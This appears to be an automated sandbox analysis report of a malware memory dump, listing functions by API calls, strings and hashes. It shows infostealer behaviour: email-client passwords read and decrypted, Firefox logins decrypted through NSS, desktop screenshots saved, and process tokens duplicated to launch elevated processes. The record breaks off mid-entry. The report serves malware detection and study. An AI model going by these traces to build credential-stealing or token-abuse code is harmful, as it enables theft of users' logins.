Part of subcall function 00435A1E: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000000,00000000,00000000,00000000,00000000,?,73B769A0,?,00000000), ref: 00435A6E
Part of subcall function 00435A1E: lstrcpyA.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,73B769A0,?,00000000), ref: 00435A91
Part of subcall function 00435A1E: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000001B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,73B769A0), ref: 00435ABD

Part of subcall function 00435ADB: lstrlenA.KERNEL32(?,?,?,?,?,?,?,00429C15,00000001,?,ftp://,00000006,?,Microsoft_WinInet_,00000012), ref: 00435B00
Part of subcall function 00435ADB: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,?,?,00429C15,00000001,?,ftp://,00000006,?,Microsoft_WinInet_,00000012), ref: 00435B27

lstrlenW.KERNEL32(POP3 Password2,?,?,?,?,?,?,00000000,00000000), ref: 00434BC9

Strings

POP3 User, xrefs: 00434AE5
Email, xrefs: 00434AD0
NNTP Password2, xrefs: 00434B90
SMTP User, xrefs: 00434B01
IMAP User, xrefs: 00434AEC
IMAP Password, xrefs: 00434C25
NNTP Email Address, xrefs: 00434AAA
NNTP Password, xrefs: 00434C2F
IMAP Server, xrefs: 00434AC2
SMTP Password2, xrefs: 00434B9E
POP3 Password2, xrefs: 00434B81, 00434BB3, 00434BC8
POP3 User Name, xrefs: 00434A96
SMTP User Name, xrefs: 00434AA0
NNTP Server, xrefs: 00434ABB
IMAP User Name, xrefs: 00434AC9
HTTP Server URL, xrefs: 00434ADE
%d, xrefs: 00434DC2
SMTP Email Address, xrefs: 00434A6E, 00434B10, 00434B25
SMTP Server, xrefs: 00434A73
SMTP Port, xrefs: 00434D61
POP3 Password, xrefs: 00434C20, 00434C55, 00434CF6
IMAP Password2, xrefs: 00434B86
HTTP User, xrefs: 00434AD7
NNTP User Name, xrefs: 00434AB4
POP3 Server, xrefs: 00434A86
HTTPMail User Name, xrefs: 00434AF3
HTTPMail Server, xrefs: 00434AFA
IMAP Port, xrefs: 00434D6B
SMTP Password, xrefs: 00434C3D
POP3 Port, xrefs: 00434D5C, 00434D80, 00434D9B
HTTPMail Password2, xrefs: 00434B97
HTTP Password, xrefs: 00434C36

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$ByteCharMultiQueryValueWidelstrcpy$CloseCryptDataFreeLocalOpenUnprotect_freewsprintf
String ID: %d$Email$HTTP Password$HTTP Server URL$HTTP User$HTTPMail Password2$HTTPMail Server$HTTPMail User Name$IMAP Password$IMAP Password2$IMAP Port$IMAP Server$IMAP User$IMAP User Name$NNTP Email Address$NNTP Password$NNTP Password2$NNTP Server$NNTP User Name$POP3 Password$POP3 Password2$POP3 Port$POP3 Server$POP3 User$POP3 User Name$SMTP Email Address$SMTP Password$SMTP Password2$SMTP Port$SMTP Server$SMTP User$SMTP User Name
API String ID: 2832241015-3646352405
Opcode ID: 72fb23e4c2fa91feac477979f322b6e2e1dcc1cc9a7e55b61101fed14ab6b8a1
Instruction ID: 91bb0a062eb22744b558d3d2405683025fa418893456fa80a50a6e8a22fc02ee
Opcode Fuzzy Hash: 72fb23e4c2fa91feac477979f322b6e2e1dcc1cc9a7e55b61101fed14ab6b8a1
Instruction Fuzzy Hash: B1B153B1E002189BDF00EF959885BEE77B9AF49304F14D05EE409BB341DBB86E458B99

Uniqueness

Uniqueness Score: -1.00%

Function 0042C157, Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 193windowmemoryfileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042C15C
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0042C18A
GetDesktopWindow.USER32 ref: 0042C190
GetWindowRect.USER32 ref: 0042C19D
GetWindowDC.USER32(00000000), ref: 0042C1A4
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042C1C4
CreateCompatibleDC.GDI32(00000000), ref: 0042C1CD
CreateDIBSection.GDI32(?,00000028,00000001,?,00000000,00000000), ref: 0042C218
DeleteDC.GDI32(00000000), ref: 0042C22C
DeleteDC.GDI32(?), ref: 0042C231
SaveDC.GDI32(00000000), ref: 0042C238
SelectObject.GDI32(00000000,?), ref: 0042C244
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0042C25D
RestoreDC.GDI32(00000000,00000000), ref: 0042C265
DeleteDC.GDI32(00000000), ref: 0042C272
DeleteDC.GDI32(?), ref: 0042C277
GdipAlloc.GDIPLUS(00000010), ref: 0042C27B
GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0042C29B
_mbstowcs.LIBCMT ref: 0042C30E
GdipSaveImageToFile.GDIPLUS(?,00000000,?,?), ref: 0042C32B
DeleteObject.GDI32(00000010), ref: 0042C350
GdiplusShutdown.GDIPLUS(?), ref: 0042C359

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Strings

(, xrefs: 0042C1EC

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Delete$CreateGdipWindow$GdiplusObjectSave$AllocBitmapCapsCompatibleDeallocateDesktopDeviceFileFromH_prologImageRectRestoreSectionSelectShutdownStartup_mbstowcs
String ID: (
API String ID: 4140672344-3887548279
Opcode ID: 062156f9da9476c7d83830b067653b8898b9941109b84b55887bfb3140d3f7c0
Instruction ID: 536baf2ac2d265ee9edbed5a4aa1064016baa7b26e1b3fc26adfe330e756f817
Opcode Fuzzy Hash: 062156f9da9476c7d83830b067653b8898b9941109b84b55887bfb3140d3f7c0
Instruction Fuzzy Hash: D471F5B2E00219EFDB11DFA5DD849AEBBB8FF08344F10452AE906E7210E7745942CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00438EA2, Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 141processCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00438EA7
CreateToolhelp32Snapshot.KERNEL32 ref: 00438F09
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00438F23
OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,00000000), ref: 00438F97
OpenProcessToken.ADVAPI32(00000000,000F01FF,?,?,?,00000000), ref: 00438FA9
DuplicateTokenEx.ADVAPI32(?,000F01FF,00000000,00000002,00000001,?,?,?,00000000), ref: 00438FC4
CloseHandle.KERNEL32(?,?,?,00000000), ref: 00438FD1
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,00000000), ref: 00438FE4
_strlen.LIBCMT ref: 00438FF1
_mbstowcs.LIBCMT ref: 00439006
CreateProcessWithTokenW.ADVAPI32(?,00000001,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00439020
CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00439027
Process32NextW.KERNEL32(00000000,0000022C), ref: 00439039

Strings

,IT\, xrefs: 00438EB5
I, xrefs: 00438ECF
@C^I, xrefs: 00438EBF

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ProcessToken$CloseCreateHandleOpenProcess32$DuplicateFileFirstH_prologModuleNameNextSnapshotToolhelp32With_mbstowcs_strlen
String ID: ,IT\$@C^I$I
API String ID: 1291480875-689018195
Opcode ID: fa5ad59d52b0f8aeb3c9f1c4fe074e3b1ae945eb73462c212e7c11c2c07f3d20
Instruction ID: 06c07594f26725b4e811cf0b98ea9e518ac7d03467aa7897a4f470019913d4f6
Opcode Fuzzy Hash: fa5ad59d52b0f8aeb3c9f1c4fe074e3b1ae945eb73462c212e7c11c2c07f3d20
Instruction Fuzzy Hash: C1417371E00209AFDF15DFA1DC85AEEB77DEF08305F10806AF501A6151EB789E49CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00418F0B, Relevance: 21.5, APIs: 1, Strings: 11, Instructions: 512COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00418F10

Part of subcall function 0040B7F6: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,00488780,00488780,00000000,?,?,004207F8,00000000,?,00000000), ref: 0040B80A
Part of subcall function 0040B7F6: CreateDirectoryTransactedA.KERNEL32 ref: 0040B823
Part of subcall function 0040B7F6: CommitTransaction.KTMW32(00000000,?,004207F8,00000000,?,00000000,00000000), ref: 0040B82E

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

Strings

~wfa, xrefs: 004190B0
=,*, xrefs: 00419326
HY, xrefs: 00418F43
Jd 9%$, xrefs: 00419433
ZLAA, xrefs: 00418F39
;66?, xrefs: 00419224
', xrefs: 00419194
?"5>, xrefs: 00419216
/)t-, xrefs: 0041921D
2??6, xrefs: 0041918D
+"34, xrefs: 004194E5

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateDeallocateTransaction$CommitDirectoryH_prologTransacted
String ID: '$+"34$/)t-$2??6$;66?$=,*$?"5>$HY$Jd 9%$$ZLAA$~wfa
API String ID: 1196510075-1151293105
Opcode ID: 55f393e21ca07d3667a09e7cb054049e33c21f4441a386277574831ca77ca9e8
Instruction ID: 06c2e3f14748fe4e8969c80ed5f3e41e758eb03313af220b2522ce733aee2f2b
Opcode Fuzzy Hash: 55f393e21ca07d3667a09e7cb054049e33c21f4441a386277574831ca77ca9e8
Instruction Fuzzy Hash: CF32CF30D00298CACF15DFA5C9A0AEDFBB1BF59304F0441AEE4457B282DB785A89CF09

Uniqueness

Uniqueness Score: -1.00%

Function 00422D2B, Relevance: 19.8, APIs: 4, Strings: 7, Instructions: 593COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00422D30
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000001,00000000), ref: 00422D5C

Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C

Part of subcall function 0040AC66: __EH_prolog.LIBCMT ref: 0040AC6B

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

sqlite3_finalize.NSS3(?), ref: 00423524
sqlite3_close.NSS3(?), ref: 00423531

Strings

Profiles, xrefs: 00422D6E
,x~yi, xrefs: 004232CD
`, xrefs: 0042332F
%cdiv`, xrefs: 004232F6
zv`, xrefs: 00423031
], xrefs: 00423237
G, xrefs: 00423351

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$Deallocate$FolderPath_strcatsqlite3_closesqlite3_finalize
String ID: %cdiv`$,x~yi$G$Profiles$]$`$zv`
API String ID: 1363784328-781617784
Opcode ID: 9b25f6ab0558411c20154c538bfd5975acd9c3370b3c41768e9aae6850839759
Instruction ID: d8a1a7678dddb3245489243c8c1f9a4158df91878c47eb1026a4bf6f17522207
Opcode Fuzzy Hash: 9b25f6ab0558411c20154c538bfd5975acd9c3370b3c41768e9aae6850839759
Instruction Fuzzy Hash: B7429C30E04398DBDF15DBA4D890BDDBBB1AF59304F1040AED4497B282DB785E89CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00462391, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 004571CB: GetLastError.KERNEL32(?,?,?,00444B46,?,00438E89,00000000,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 004571D0
Part of subcall function 004571CB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 0045726E

GetACP.KERNEL32(?,?,?,?,?,?,004555FC,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00462452
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004555FC,?,?,?,00000055,?,-00000050,?,?), ref: 0046247D
_wcschr.LIBVCRUNTIME ref: 00462511
_wcschr.LIBVCRUNTIME ref: 0046251F
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 004625E0

Strings

utf8, xrefs: 0046254F
0&G, xrefs: 00462408

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: 0&G$utf8
API String ID: 4147378913-2116212543
Opcode ID: 28e527850fa7b31019f655cd1a1be333e9fc89f3bbd8298ec0b10fafe0388aae
Instruction ID: 80d7c2a65ae141ca0afc562d5d58411de800cdeae6eec3c0137acb6db90b692b
Opcode Fuzzy Hash: 28e527850fa7b31019f655cd1a1be333e9fc89f3bbd8298ec0b10fafe0388aae
Instruction Fuzzy Hash: 1B711971A00A01B6D725AB35CD45BAB73A8EF44354F14442BF906D7281FBBCE941876F

Uniqueness

Uniqueness Score: -1.00%

Function 00462CF2, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 004571CB: GetLastError.KERNEL32(?,?,?,00444B46,?,00438E89,00000000,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 004571D0
Part of subcall function 004571CB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 0045726E

Part of subcall function 004571CB: _free.LIBCMT ref: 0045722D
Part of subcall function 004571CB: _free.LIBCMT ref: 00457263

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00462DFE
IsValidCodePage.KERNEL32(00000000), ref: 00462E47
IsValidLocale.KERNEL32(?,00000001), ref: 00462E56
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00462E9E
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00462EBD

Strings

0&G, xrefs: 00462DAB

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID: 0&G
API String ID: 949163717-4031540117
Opcode ID: cd39c310aa637117c93bf4081066d7437827290a16fd8fd16966563f2804ea81
Instruction ID: 1d3261a399e5f10e9d6bd41579e0021277c6c2d0d88e0b97eccc3c8f871f5250
Opcode Fuzzy Hash: cd39c310aa637117c93bf4081066d7437827290a16fd8fd16966563f2804ea81
Instruction Fuzzy Hash: 2D51A171A00A05BBDB10DFA5DE45AEF73B8AF15700F14443BE900E7281FBF999448B6A

Uniqueness

Uniqueness Score: -1.00%

Function 00420F09, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 141encryptionCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00420F0E
_strlen.LIBCMT ref: 00420F7D
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,00001FA0,00000000,00000000), ref: 00420F85
PK11_GetInternalKeySlot.NSS3(?,00000000,00000001,?,00001FA0,00000000,00000000,?,logins,logins), ref: 00420F93
PK11_FreeSlot.NSS3(?,?,00001FA0,00000000,00000000,?,logins,logins), ref: 0042106C

Strings

\9.., xrefs: 00421039

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: K11_Slot$BinaryCryptFreeH_prologInternalString_strlen
String ID: \9..
API String ID: 1828113442-1559541242
Opcode ID: c3b565528dda96f0a68dd3199878a202d0884c4bb2682e41e0e2680e4b187075
Instruction ID: 64a03f6aa18cb93dff9a2b808c782169ae701cf29973bbf3d6bf49cfdf4bd89c
Opcode Fuzzy Hash: c3b565528dda96f0a68dd3199878a202d0884c4bb2682e41e0e2680e4b187075
Instruction Fuzzy Hash: 5451F670E0429ADFCB10CFA9A8905FEFBB9BF15344F50446EE405E3651C7788A45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00462B1D, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,;.F,00000002,00000000,?,?,?,00462E3B,?,00000000), ref: 00462BB6
GetLocaleInfoW.KERNEL32(?,20001004,;.F,00000002,00000000,?,?,?,00462E3B,?,00000000), ref: 00462BDF
GetACP.KERNEL32(?,?,00462E3B,?,00000000), ref: 00462BF4

Strings

OCP, xrefs: 00462B71
ACP, xrefs: 00462B3B
;.F, xrefs: 00462BD0, 00462BED, 00462BA7, 00462BC0, 00462BAA, 00462BD3

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InfoLocale
String ID: ;.F$ACP$OCP
API String ID: 2299586839-1457925780
Opcode ID: 5c7067c7b288a4d404b23b9a970682669cb147bbd759df666153cb31040f7199
Instruction ID: 379cace6e81663d93113db7ee644bfd9379d2bd014fb6d52a8f329d2a92a608a
Opcode Fuzzy Hash: 5c7067c7b288a4d404b23b9a970682669cb147bbd759df666153cb31040f7199
Instruction Fuzzy Hash: AA21A162B00901BADB348F14CB01B9773A6EB54F61B168426E90AD7204F7BAEE41D35E

Uniqueness

Uniqueness Score: -1.00%

Function 0046475B, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 004648D6

Strings

1#QNAN, xrefs: 00465A74
1#INF, xrefs: 00465A91
1#SNAN, xrefs: 00465A6D
1#IND, xrefs: 00465A66

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 9bfc77a39340625b6a86301f1729f2823a018047853ca022371e3ebffeb52bd6
Instruction ID: b99cd9423779b4525a49100b28b65ef5ab2a0d10b4fffb5f170f5505121d02b7
Opcode Fuzzy Hash: 9bfc77a39340625b6a86301f1729f2823a018047853ca022371e3ebffeb52bd6
Instruction Fuzzy Hash: AFC22671E046288FDF25CE28DD407EAB3B5EB89315F1441EBD84DA7240E778AE858F46

Uniqueness

Uniqueness Score: -1.00%

Function 0042AE7B, Relevance: 9.3, APIs: 6, Instructions: 332fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042AE80
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000), ref: 0042AF89
CloseHandle.KERNEL32(00000000), ref: 0042AF97
GetFileSize.KERNEL32(00000000,00000000), ref: 0042AFD5
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0042AFFE
CloseHandle.KERNEL32(00000000), ref: 0042B005

Part of subcall function 0040B7A7: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,00488780,00000000,00000000,?,004209C9,00000000), ref: 0040B7BA
Part of subcall function 0040B7A7: DeleteFileTransactedA.KERNEL32 ref: 0040B7D1
Part of subcall function 0040B7A7: CommitTransaction.KTMW32(00000000,?,004209C9,00000000), ref: 0040B7DC

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CloseCreateHandleTransaction$CommitDeleteH_prologReadSizeTransacted
String ID:
API String ID: 604483397-0
Opcode ID: 9899d5ab7b3a33c668fe2143f52442171252bb7837c2d4bab0a04dcb1c0a0bb6
Instruction ID: b8766d09fb98885bdc4d1cecf9e9a152cf025d0464098f84976b9c676aee690e
Opcode Fuzzy Hash: 9899d5ab7b3a33c668fe2143f52442171252bb7837c2d4bab0a04dcb1c0a0bb6
Instruction Fuzzy Hash: 3AE1B070D042A8DBDB11DFA4DA91BEEFB74AF16304F1081AEE44977242DB740A89CB55

Uniqueness

Uniqueness Score: -1.00%

Function 004187EC, Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 479COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004187F1

Strings

]l, xrefs: 00418DFC
4, xrefs: 0041881A
;g~OS^I^NV, xrefs: 00418BA7
UTC_, xrefs: 0041897A, 00418CE2

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: 4$;g~OS^I^NV$UTC_$]l
API String ID: 3519838083-94711056
Opcode ID: 02b1ce8afff3f727ee922874f6f12158742ad410ba677b727b70a60391cd37b6
Instruction ID: c0c91f5fd6471e2e50090fd34c7bad8f20c85e4933e5248af696d8c31e721590
Opcode Fuzzy Hash: 02b1ce8afff3f727ee922874f6f12158742ad410ba677b727b70a60391cd37b6
Instruction Fuzzy Hash: 8022AF70D002888BDF15EFA5C950AEDFBB5AF59304F1480AFE44577282DF781A89CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00434FE3, Relevance: 9.0, APIs: 7, Instructions: 206stringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 004350A0
lstrlenW.KERNEL32(00000010), ref: 004350AA
lstrlenA.KERNEL32(?), ref: 004350E9
lstrlenA.KERNEL32(?), ref: 00435122
lstrlenA.KERNEL32(A9A6C8CA), ref: 00435168

Part of subcall function 00435ADB: lstrlenA.KERNEL32(?,?,?,?,?,?,?,00429C15,00000001,?,ftp://,00000006,?,Microsoft_WinInet_,00000012), ref: 00435B00
Part of subcall function 00435ADB: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,?,?,00429C15,00000001,?,ftp://,00000006,?,Microsoft_WinInet_,00000012), ref: 00435B27

lstrlenW.KERNEL32(?), ref: 004351A7

Part of subcall function 00435A1E: lstrlenA.KERNEL32(?,?,73B769A0,?,00000000), ref: 00435A4F
Part of subcall function 00435A1E: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000000,00000000,00000000,00000000,00000000,?,73B769A0,?,00000000), ref: 00435A6E
Part of subcall function 00435A1E: lstrcpyA.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,73B769A0,?,00000000), ref: 00435A91
Part of subcall function 00435A1E: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000001B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,73B769A0), ref: 00435ABD

lstrlenA.KERNEL32(0000A28A), ref: 004351E6

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$ByteCharMultiWidelstrcpy$wsprintf
String ID:
API String ID: 130686893-0
Opcode ID: d4e69ecdfcd60a6e9e495130f570b14d40ba10c407f648a28dbf9ae2dbdb0a74
Instruction ID: 8e2ecd1ce7327d82d29d0b7adc58e5628de1f4086e28be26ba8d16d112b71d7b
Opcode Fuzzy Hash: d4e69ecdfcd60a6e9e495130f570b14d40ba10c407f648a28dbf9ae2dbdb0a74
Instruction Fuzzy Hash: BB814830D0828C9ADF06DFB8D8546EEFFF1AF1D300F14919EE485AB252E6784645CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0044A480, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 450COMMON

Download Yara Rule

Strings

|XF, xrefs: 0044A8A7, 0044A6E5, 0044A6ED
|XF, xrefs: 0044A49B, 0044A624, 0044A84D, 0044A7E7, 0044A673, 0044A5F9

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: |XF$|XF
API String ID: 0-514644214
Opcode ID: 2d847a52f5baafd09b63a6ef73b7ffb79837118a5456080be83dbd4c6ff1e96c
Instruction ID: a2fcbab35829f1a111f05cde10400a04ba28e7ece359143868105aa135b3a241
Opcode Fuzzy Hash: 2d847a52f5baafd09b63a6ef73b7ffb79837118a5456080be83dbd4c6ff1e96c
Instruction Fuzzy Hash: D5F16E71E402199FEF14CFA9C9806AEBBB1FF48314F15826ED819AB340D734AE11CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0041EBE9, Relevance: 6.5, Strings: 5, Instructions: 277COMMON

Download Yara Rule

Strings

unknown compression method, xrefs: 0041EC53
invalid window size, xrefs: 0041EC72
incorrect header check, xrefs: 0041ECC0
incorrect data check, xrefs: 0041EDFA
need dictionary, xrefs: 0041EEFA

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: incorrect data check$incorrect header check$invalid window size$need dictionary$unknown compression method
API String ID: 0-2151277842
Opcode ID: 924b15dbf6a6470855d361110034c46afb2abe93b6f2ab4350515d2f06f1459d
Instruction ID: 6b9b747d69bed3b381a42e3d42685e617446427c5f72de8439c62fc88671226d
Opcode Fuzzy Hash: 924b15dbf6a6470855d361110034c46afb2abe93b6f2ab4350515d2f06f1459d
Instruction Fuzzy Hash: 99B1E4B5600701CFD374CF1AC484A62BBF0EB49714B258A5ED8EACB752D739E886CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00440B62, Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00440B6E
IsDebuggerPresent.KERNEL32 ref: 00440C3A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00440C5A
UnhandledExceptionFilter.KERNEL32(?), ref: 00440C64

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: f967f4adda7a0b6eafcce18aeababb87d47420303b1c5124f15b8f9715fa39ad
Instruction ID: bee11a539c97b005e841a0db625c3b4e910789cb48280a66c3f9e376b6664827
Opcode Fuzzy Hash: f967f4adda7a0b6eafcce18aeababb87d47420303b1c5124f15b8f9715fa39ad
Instruction Fuzzy Hash: 36311A75D0531DDBEB20DFA5DD89BCDBBB8AF08304F1041EAE509A7250EB749A848F49

Uniqueness

Uniqueness Score: -1.00%

Function 004627A4, Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 004571CB: GetLastError.KERNEL32(?,?,?,00444B46,?,00438E89,00000000,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 004571D0
Part of subcall function 004571CB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 0045726E

Part of subcall function 004571CB: _free.LIBCMT ref: 0045722D
Part of subcall function 004571CB: _free.LIBCMT ref: 00457263

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004627F8
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00462842
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00462908

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InfoLocale$ErrorLast_free
String ID:
API String ID: 3140898709-0
Opcode ID: 03a44e678e49a72788f6fa958e4446c0cb9ca14480530f1661c040c35672a11a
Instruction ID: 8fdc4d0ca9bcdec7de62ba05e5a14b9e9ad91cb5cc159aebfe6bae3a79f0d915
Opcode Fuzzy Hash: 03a44e678e49a72788f6fa958e4446c0cb9ca14480530f1661c040c35672a11a
Instruction Fuzzy Hash: 4361D671A00907ABDB249F25CD82BAA73A8EF44310F10457BED05D6281F7B8D985DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00446625, Relevance: 4.6, APIs: 3, Instructions: 77COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0044671D
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00446727
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00446734

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 2d4006cb0a490a5fe41f1898d73e103fe16c5dc7b54f67e4d822d4b5d790393b
Instruction ID: 384e1e98cc9cb4c7df0328988c5faaeb1f33e534a7a093ac3da55adf85ff94e3
Opcode Fuzzy Hash: 2d4006cb0a490a5fe41f1898d73e103fe16c5dc7b54f67e4d822d4b5d790393b
Instruction Fuzzy Hash: 0331C274D0121C9BDB21DF65DD8978DBBB8BF08314F6041EAE41CA7250EB749B858F49

Uniqueness

Uniqueness Score: -1.00%

Function 0043E03E, Relevance: 4.6, APIs: 3, Instructions: 56timeCOMMON

Download Yara Rule

APIs

